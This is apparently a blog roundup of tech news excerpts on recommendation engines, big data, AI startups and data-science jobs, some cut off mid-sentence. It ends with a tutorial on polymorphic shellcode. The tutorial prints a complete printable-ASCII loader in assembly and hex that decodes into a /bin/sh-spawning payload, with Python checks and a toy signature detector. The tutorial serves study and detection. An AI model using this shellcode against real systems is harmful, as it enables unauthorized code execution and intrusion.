The Ultimate Challenge For Recommendation Engines | MIT Technology Review

If you share an online movie account with other people in your household, you probably receive some inappropriate recommendations. That may soon change.

The phrase “People who bought X, also bought Y” has become one of the celebrated monikers of the internet era. This particular form of words comes from recommendation engines that analyse the products you have bought in the past to suggest products you might like in future, usually based on the choices made by other people with similar tastes.

Good recommendation engines can increase sales by several percent, which is why they have become one of the must-have features for online shops and services.

So it is not hard to understand why there is considerable interest in improving the performance of recommendation engines. Indeed, in 2006, the online movie provider, Netflix, offered a prize of $1 million to anybody who could improve their recommendation algorithm by more than 10 percent. The prize was duly snapped up a mere three years later.

So where might the next improvements come from?

Today, we get an answer of sorts thanks to the work of Amy Zhang at the Massachusetts Institute of Technology in Cambridge and a couple of pals. These guys point out that when it comes to online services such as movie providers, several individuals often share the same account. That means that the choice of movies and the ratings on this account are the combined choices of several different people.

The question they set out to answer is whether it is possible to identify shared accounts simply by studying the ratings associated with them. And if so, how should recommendations be modified in response?

via The Ultimate Challenge For Recommendation Engines | MIT Technology Review.

This analysis of modern history is a prime example of why big data really matters

Gigaom

We might be tiring of the term big data, but there’s still a lot of value to be squeezed from the concept. This is true even in its purest form, where we’re doing relatively simple operations on a mountain of data in order to see if there’s a notable trend or correlation in there.

The latest example of why this is true comes from GDELT, the massive geosocial-event database that’s now housed in Google’s cloud. Its creator, Georgetown professor Kalev Leetaru, has analyzed the Arab Spring uprising in Egypt, as well as the current situation in Ukraine, against data dating back to 1979 in an attempt to answer the question of whether history really does repeat itself.

Finding the answer, he acknowledges, will take a lot more expert analysis, but his data can give researchers a great start. The process of generating it was a single SQL query (researchers can…

Forget Siri: This Radical New AI Teaches Itself and Reads Your Mind | Enterprise | WIRED

BY STEVEN LEVY

Viv was named after the Latin root meaning live. Its San Jose, California, offices are decorated with tchotchkes bearing the numbers six and five (VI and V in Roman numerals). ARIEL ZAMBELICH

When Apple announced the iPhone 4S on October 4, 2011, the headlines were not about its speedy A5 chip or improved camera. Instead they focused on an unusual new feature: an intelligent assistant, dubbed Siri. At first Siri, endowed with a female voice, seemed almost human in the way she understood what you said to her and responded, an advance in artificial intelligence that seemed to place us on a fast track to the Singularity. She was brilliant at fulfilling certain requests, like “Can you set the alarm for 6:30?” or “Call Diane’s mobile phone.” And she had a personality: If you asked her if there was a God, she would demur with deft wisdom. “My policy is the separation of spirit and silicon,” she’d say.

Over the next few months, however, Siri’s limitations became apparent. Ask her to book a plane trip and she would point to travel websites—but she wouldn’t give flight options, let alone secure you a seat. Ask her to buy a copy of Lee Child’s new book and she would draw a blank, despite the fact that Apple sells it. Though Apple has since extended Siri’s powers—to make an OpenTable restaurant reservation, for example—she still can’t do something as simple as booking a table on the next available night in your schedule. She knows how to check your calendar and she knows how to use OpenTable. But putting those things together is, at the moment, beyond her.

Now a small team of engineers at a stealth startup called Viv Labs claims to be on the verge of realizing an advanced form of AI that removes those limitations. Whereas Siri can only perform tasks that Apple engineers explicitly implement, this new program, they say, will be able to teach itself, giving it almost limitless capabilities. In time, they assert, their creation will be able to use your personal preferences and a near-infinite web of connections to answer almost any query and perform almost any function.

“Siri is chapter one of a much longer, bigger story,” says Dag Kittlaus, one of Viv’s cofounders. He should know. Before working on Viv, he helped create Siri. So did his fellow cofounders, Adam Cheyer and Chris Brigham.

For the past two years, the team has been working on Viv Labs’ product—also named Viv, after the Latin root meaning live. Their project has been draped in secrecy, but the few outsiders who have gotten a look speak about it in rapturous terms. “The vision is very significant,” says Oren Etzioni, a renowned AI expert who heads the Allen Institute for Artificial Intelligence. “If this team is successful, we are looking at the future of intelligent agents and a multibillion-dollar industry.”

Viv is not the only company competing for a share of those billions. The field of artificial intelligence has become the scene of a frantic corporate arms race, with Internet giants snapping up AI startups and talent. Google recently paid a reported $500 million for the UK deep-learning company DeepMind and has lured AI legends Geoffrey Hinton and Ray Kurzweil to its headquarters in Mountain View, California. Facebook has its own deep-learning group, led by prize hire Yann LeCun from New York University. Their goal is to build a new generation of AI that can process massive troves of data to predict and fulfill our desires.

via Forget Siri: This Radical New AI Teaches Itself and Reads Your Mind | Enterprise | WIRED.

Big Data’s High-Priests of Algorithms – Wall Street Journal

‘Data Scientists’ Meld Statistics and Software for Find Lucrative High-Tech

By ELIZABETH DWOSKIN

Aug. 8, 2014 8:11 p.m. ET

Saba Zuberi, an astrophysicist working as a data scientist at TaskRabbit, said working for a consumer Internet firm can be surprisingly rewarding. Ramin Rahimian for The Wall Street Journal

For his Ph.D. in astrophysics, Chris Farrell spent five years mining data from a giant particle accelerator. Now, he spends his days analyzing ratings for Yelp Inc.’s online business-review site.

Mr. Farrell, 28 years old, is a data scientist, a job title that barely existed three years ago but since has become one of the hottest corners of the high-tech labor market. Retailers, banks, heavy-equipment makers and matchmakers all want specialists to extract and interpret the explosion of data from Internet clicks, machines and smartphones, setting off a scramble to find or train them.

“People call them unicorns” because the combination of skills required is so rare, said Jonathan Goldman, who ran LinkedIn Corp.’s data-science team that in 2007 developed the “People You May Know” button, which five years later drove more than half of the invitations on the professional-networking platform.

Employers say the ideal candidate must have more than traditional market-research skills: the ability to find patterns in millions of pieces of data streaming in from different sources, to infer from those patterns how customers behave and to write statistical models that pinpoint behavioral triggers.

At e-commerce site operator Etsy Inc., for instance, a biostatistics Ph.D. who spent years mining medical records for early signs of breast cancer now writes statistical models to figure out the terms people use when they search Etsy for a new fashion they saw on the street.

At mobile-payments startup Square Inc., a Ph.D. in cognitive psychology who wrote statistical models to examine how people change their political beliefs now looks for behavioral patterns that would identify which merchants are more likely to have clients demand their money back.

Another 28-year-old at Yelp, with a Ph.D. in applied mathematics, turned his dissertation research on genome mapping into a product used by the company’s advertising team. The same genome-mapping algorithm is now used to measure the effect on consumers when multiple small changes are made to online ads.

“Academia is slow and only a few people see your work,” said Scott Clark, who designed the genome-mapping algorithm. “At Yelp, I can be pushing out experiments that affect hundreds of millions of people. When I make a small change to the Yelp website, I have a bigger impact.”

via Academic Researchers Find Lucrative Work as ‘Big Data’ Scientists – WSJ.

Powerful new patent service shows every US invention, and a new view of R&D relationships

Gigaom

The U.S. Patent Office website is famously clunky: searching and sorting patents can feel like playing an old Atari game, rather than watching innovation at work. But now a young inventor has come along with a tool to build a better patent office.

The service is called Trea, and was launched by Max Yuan, an engineer who received a patent of his own for a bike motor in 2007. After writing a tool to download patents related to his own invention, he expanded the process to slurp every patent and image in the USPTO database, and compile the information in a user-friendly interface.

Trea has been in beta for a while, but will formally launch on Wednesday. The tool not only provides an easy way to see what inventions a company or inventor is patenting, but also shows the fields in which they are most active. Here is…

Why a deep-learning genius left Google & joined Chinese tech shop Baidu (interview) | VentureBeat

Image Credit: Jordan Novet/VentureBeat

By Jordan Novet

SUNNYVALE, California — Chinese tech company Baidu has yet to make its popular search engine and other web services available in English. But consider yourself warned: Baidu could someday wind up becoming a favorite among consumers.

The strength of Baidu lies not in youth-friendly marketing or an enterprise-focused sales team. It lives instead in Baidu’s data centers, where servers run complex algorithms on huge volumes of data and gradually make its applications smarter, including not just Web search but also Baidu’s tools for music, news, pictures, video, and speech recognition.

Despite lacking the visibility (in the U.S., at least) of Google and Microsoft, Baidu has done a lot of work in recent years on deep learning, one of the most promising areas of artificial intelligence (AI) research. This work involves training systems called artificial neural networks on lots of information derived from audio, images, and other inputs, and then presenting the systems with new information and receiving inferences about it in response.

Two months ago, Baidu hired Andrew Ng away from Google, where he started and led the so-called Google Brain project. Ng, whose move to Baidu follows Hugo Barra’s jump from Google to Chinese company Xiaomi last year, is one of the world’s handful of deep-learning rock stars.

Ng has taught classes on machine learning, robotics, and other topics at Stanford University. He also co-founded massively open online course startup Coursera.

via Why a deep-learning genius left Google & joined Chinese tech shop Baidu (interview) | VentureBeat | Big Data | by Jordan Novet.

GraphLab thinks its new software can democratize machine learning

Gigaom

GraphLab, a Seattle-based startup that launched in 2013 to develop an open source project of the same name, is releasing next week its first commercial software, called GraphLab Create. Unlike the open source software that is focused on graph analysis, Create is designed for data stored in graphs or tables, and can be used to easily run any number of popular machine learning tasks.

Carlos Guestrin, the company’s co-founder and CEO, said the goal of Create is to help savvy engineers or data scientists take their machine learning projects from idea to production. It includes a handful of modules for building certain types of popular workloads, including recommendation engines, graph analysis and clustering and regression algorithms.

We have previously covered some of the disillusionment with current machine learning libraries — many of which are open source — with regard to speed and ease of use. Even where those factors are improving

What the hell ! | Damn’ Shell

Smuggling – Wikipedia describes the word as “the illegal transportation of objects or people, such as out of a building, into a prison, or across an international border, in violation of applicable laws or other regulations”.

Come to think of it – when you think of the word ‘smuggling’, the first thing that comes to mind is ‘it’s wrong’, which is true. But if you can overlook the legalities and dive a bit deeper into the specifics, you might just find a new, or rather ‘ingenious’, transportation method that we’ve been oblivious to all along. This sort of ingenuity carries over from the real world into the virtual world, considering it’s an extension of the real world by design. The art of stealth is at the core of offensive computer security, and being able to smuggle stuff into a target environment is considered ‘nirvana’ in the field.

The bad guys (for lack of a better word) spend a considerable amount of time mastering the art of smuggling all kinds of malicious code onto a target environment and in some cases the amount of time spent developing the actual code/payload is far less when compared to the amount of time spent devising a way to get it to its destination.

One such method involves employing polymorphism – a concept that clearly has one too many definitions (thanks to the technology/internet gurus). It’s nothing more than code that modifies itself (by adding or deleting parts) when executed. This underlying idea allows you to change what your code/payload looks like without ever changing what it does (essentially a state change without any change in functionality), which makes it ideal for evading detection during transportation. Put simply, it’s a bomb that doesn’t look like a bomb until it’s ready.

Of all the virtual bomb-making tools, the one that’s really ubiquitous is ‘shellcode’, for it takes away most of the abstractions of higher-level programming languages. Shellcode is code written in ‘assembly’ without any restrictions on the layout of the code, i.e. it’s position-independent. In other words, shellcode allows you to write code in a language that is almost native to the target (i.e. system/processor), providing you with a great deal of flexibility.

For example – ASCII shellcode can get past most ASCII character checks/filters. Here is what it looks like in assembly [1]:

 

BITS 32

push esp                               ; Put current ESP
pop eax                                ; into EAX.
sub eax, 0x39393333                    ; Subtract printable values
sub eax,0x72727550                     ; to add 860 to EAX.
sub eax,0x54545421
push eax                               ; Put EAX back into ESP.
pop esp                                ; Effectively ESP = ESP + 860

and eax,0x454e4f4a
and eax,0x3a313035                     ; Zero out EAX.

sub eax,0x346d6d25                     ; Subtract printable values
sub eax,0x256d6d25                     ; to make EAX = 0x80cde189.
sub eax,0x2557442d                     ; (last 4 bytes from shellcode.bin)

push eax                               ; Push these bytes to stack at ESP.
sub eax,0x59316659                     ; Subtract more printable values
sub eax,0x59667766                     ; to make EAX = 0x53e28951.
sub eax,0x7a537a79                     ; (next 4 bytes of shellcode from the end)
push eax
sub eax,0x25696969
sub eax,0x25786b5a
sub eax,0x25774625
push eax                                         ; EAX = 0xe3896e69
sub eax,0x366e5858
sub eax,0x25773939
sub eax,0x25747470
push eax                                         ; EAX = 0x622f6868
sub eax,0x25257725
sub eax,0x71717171
sub eax,0x5869506a
push eax                                         ; EAX = 0x732f2f68
sub eax,0x63636363
sub eax,0x44307744
sub eax,0x7a434957
push eax                                         ; EAX = 0x51580b6a
sub eax,0x63363663
sub eax,0x6d543057
push eax                                         ; EAX = 0x80cda4b0
sub eax,0x54545454
sub eax,0x304e4e25
sub eax,0x32346f25
sub eax,0x302d6137
push eax                                         ; EAX = 0x99c931db
sub eax,0x78474778
sub eax,0x78727272
sub eax,0x774f4661
push eax                                         ; EAX = 0x31c03190
sub eax,0x41704170
sub eax,0x2d772d4e
sub eax,0x32483242
push eax                                         ; EAX = 0x90909090
push eax
push eax                                         ; Build a NOP sled.
push eax
push eax
push eax
push eax
push eax
push eax
push eax
push eax
push eax
push eax
push eax
push eax
push eax
push eax
push eax
push eax
push eax
push eax
push eax
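
The arithmetic in the listing is easy to check outside an assembler. The Python sketch below is only an illustration and is not part of the original listing: `sub32` and `is_printable` are hypothetical helper names, and the printable range 0x21 to 0x7e is an assumption about what a character filter would accept. It models `sub eax, imm32` as subtraction modulo 2^32 and confirms three of the listing's comments.

```python
MASK = 0xFFFFFFFF  # 32-bit registers wrap around modulo 2**32


def sub32(value, *operands):
    """Apply successive 32-bit `sub` instructions and return the wrapped result."""
    for operand in operands:
        value = (value - operand) & MASK
    return value


def is_printable(operand):
    """True when every byte of the operand is printable ASCII (assumed 0x21-0x7e)."""
    return all(0x21 <= b <= 0x7E for b in operand.to_bytes(4, "little"))


# Operands copied from the listing.
stack_adjust = (0x39393333, 0x72727550, 0x54545421)
first_dword = (0x346D6D25, 0x256D6D25, 0x2557442D)

print(sub32(0, *stack_adjust))        # 860: the three subs add 860 to the register
print(hex(0x454E4F4A & 0x3A313035))   # 0x0: the two AND masks share no set bits
print(hex(sub32(0, *first_dword)))    # 0x80cde189: the first value pushed
print(all(is_printable(op) for op in stack_adjust + first_dword))  # True
```

Subtracting three printable constants and letting the register wrap around is what lets the loader reach arbitrary 32-bit values while every byte on the wire stays printable.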

And when assembled into machine code, here’s what you get (note the repetitive pattern in its ASCII representation to the right):

00000000 54 58 2d 33 33 39 39 2d 50 75 72 72 2d 21 54 54 |TX-3399-Purr-!TT|
00000010 54 50 5c 25 4a 4f 4e 45 25 35 30 31 3a 2d 25 6d |TP\%JONE%501:-%m|
00000020 6d 34 2d 25 6d 6d 25 2d 2d 44 57 25 50 2d 59 66 |m4-%mm%--DW%P-Yf|
00000030 31 59 2d 66 77 66 59 2d 79 7a 53 7a 50 2d 69 69 |1Y-fwfY-yzSzP-ii|
00000040 69 25 2d 5a 6b 78 25 2d 25 46 77 25 50 2d 58 58 |i%-Zkx%-%Fw%P-XX|
00000050 6e 36 2d 39 39 77 25 2d 70 74 74 25 50 2d 25 77 |n6-99w%-ptt%P-%w|
00000060 25 25 2d 71 71 71 71 2d 6a 50 69 58 50 2d 63 63 |%%-qqqq-jPiXP-cc|
00000070 63 63 2d 44 77 30 44 2d 57 49 43 7a 50 2d 63 36 |cc-Dw0D-WICzP-c6|
00000080 36 63 2d 57 30 54 6d 50 2d 54 54 54 54 2d 25 4e |6c-W0TmP-TTTT-%N|
00000090 4e 30 2d 25 6f 34 32 2d 37 61 2d 30 50 2d 78 47 |N0-%o42-7a-0P-xG|
000000a0 47 78 2d 72 72 72 78 2d 61 46 4f 77 50 2d 70 41 |Gx-rrrx-aFOwP-pA|
000000b0 70 41 2d 4e 2d 77 2d 2d 42 32 48 32 50 50 50 50 |pA-N-w--B2H2PPPP|
000000c0 50 50 50 50 50 50 50 50 50 50 50 50 50 50 50 50 |PPPPPPPPPPPPPPPP| 

When executed, the above code morphs, or rather loads additional malicious code into memory, as you can see below. In other words, the shellcode does not reveal its actual form until it is eventually executed on a real CPU.
00000000 31 c0 31 db 31 c9 99 b0 a4 cd 80 6a 0b 58 51 68 |1.1.1......j.XQh|
00000010 2f 2f 73 68 68 2f 62 69 6e 89 e3 51 89 e2 53 89 |//shh/bin..Q..S.|
00000020 e1 cd 80
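
The link between the two dumps can be reproduced for analysis purposes without running anything on a CPU. The sketch below is an illustration under stated assumptions: `rebuild` is a hypothetical helper, the `PUSHED` values are copied from the `EAX = ...` comments in the listing, and `DUMP` is the hex dump directly above. It relies on two facts about 32-bit x86: the stack grows toward lower addresses, and each dword is stored little-endian.

```python
import struct

# Values pushed by the loader, in push order (from the listing's EAX comments).
PUSHED = [
    0x80CDE189, 0x53E28951, 0xE3896E69, 0x622F6868, 0x732F2F68,
    0x51580B6A, 0x80CDA4B0, 0x99C931DB, 0x31C03190,
]

# The 35 bytes shown in the second hex dump.
DUMP = bytes.fromhex(
    "31c031db31c999b0a4cd806a0b585168"
    "2f2f7368682f62696e89e35189e25389"
    "e1cd80"
)


def rebuild(pushed):
    """Return the bytes as they sit in memory once every value has been pushed.

    The last value pushed lands at the lowest address, so the push order is
    reversed; each dword is packed little-endian.
    """
    return b"".join(struct.pack("<I", value) for value in reversed(pushed))


image = rebuild(PUSHED)
print(hex(image[0]))       # 0x90: one NOP byte carried in the last pushed dword
print(image[1:] == DUMP)   # True: the rest matches the dump byte for byte
```

This is the same bookkeeping an analyst would do by hand: read the pushes bottom to top, flip each dword's byte order, and the hidden payload appears.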

 


So the big question – What can we do?

Well – traditional intrusion detection systems (IDS) like Snort, or *WAFs, can be used to detect shellcode using signature-matching techniques, where we look for known/recurring patterns or specific parts of the shellcode. Although this example is polymorphic, we can still look for the NOP-sled pattern (here, the long run of ‘push eax’ bytes that builds it), ‘sub’ instructions containing repetitive printable characters, or a combination of the two.
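
As a rough illustration of such a signature, the Python sketch below flags byte strings that contain both patterns. It is a toy heuristic, not a Snort rule or any product's detection logic: the function name, the regular expressions and the thresholds (`min_subs`, a run of eight or more pushes) are all assumptions chosen for this example, and a hyphen followed by four printable characters is common enough in ordinary text that real traffic would need a far more careful rule.

```python
import re

# 0x2d is the opcode byte of "sub eax, imm32". In the printable loader above,
# each one is followed by four printable ASCII operand bytes.
PRINTABLE_SUB = re.compile(rb"\x2d[\x21-\x7e]{4}")

# 0x50 is "push eax". The loader ends with a long run of it to build the sled.
PUSH_RUN = re.compile(rb"\x50{8,}")


def looks_like_printable_loader(data, min_subs=10):
    """Heuristic: many printable `sub eax` instructions plus a long push run."""
    sub_count = len(PRINTABLE_SUB.findall(data))
    return sub_count >= min_subs and PUSH_RUN.search(data) is not None


# Synthetic inputs for the demo (not captured traffic).
suspicious = b"-AAAA" * 12 + b"P" * 20
benign = b"GET /index.html HTTP/1.1\r\nHost: example.com\r\n\r\n"

print(looks_like_printable_loader(suspicious))  # True
print(looks_like_printable_loader(benign))      # False
```

Requiring both patterns together keeps the false-positive rate lower than either one alone, at the cost of missing variants that build their sled differently.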

Note – The above example is just one form of polymorphic shellcode. Attackers are constantly working to find more (again ingenious damn’ it) ways to sneak stuff across. Another interesting method is the use of polymorphic shellcode engines, which create different forms of the same initial shellcode by encrypting its body with a different random key each time and prepending a decryption routine that makes it self-decrypting. In such scenarios conventional signature-based detection methods fall short. Security researchers instead detect network streams that contain polymorphic exploit code by passively monitoring the incoming network traffic and attempting to “execute” each incoming request in a virtual environment as if it were executable code [2].
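
Why a fixed signature on the body stops working can be seen with a harmless stand-in. The sketch below is a simplified assumption rather than the design of any particular engine: it uses a single-byte XOR as the "encryption", two fixed keys instead of random ones so the output is reproducible, and a plain text string in place of a payload. No decryption routine is modelled.

```python
def xor_bytes(data, key):
    """XOR every byte with a one-byte key; applying it twice restores the input."""
    return bytes(b ^ key for b in data)


body = b"EXAMPLE-BODY"   # harmless stand-in for the body being hidden
signature = b"EXAMPLE"   # what a naive signature would search for

variant_a = xor_bytes(body, 0x41)
variant_b = xor_bytes(body, 0x9C)

print(signature in body)                                # True
print(signature in variant_a, signature in variant_b)   # False False
print(variant_a != variant_b)                           # True
print(xor_bytes(variant_a, 0x41) == xor_bytes(variant_b, 0x9C) == body)  # True
```

Both variants decode to the same bytes, yet neither contains the signature nor resembles the other, which is why the emulation approach in [2] looks at what the bytes do when run rather than what they look like in transit.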

 

*WAF – Web application firewalls

References –

[1] Jon Erickson, “Hacking: The Art of Exploitation”, 2nd edition

[2] Michalis Polychronakis, Kostas G. Anagnostakis and Evangelos P. Markatos, “Network-Level Polymorphic Shellcode Detection Using Emulation”, Institute of Computer Science, Foundation for Research & Technology – Hellas; Institute for Infocomm Research, Singapore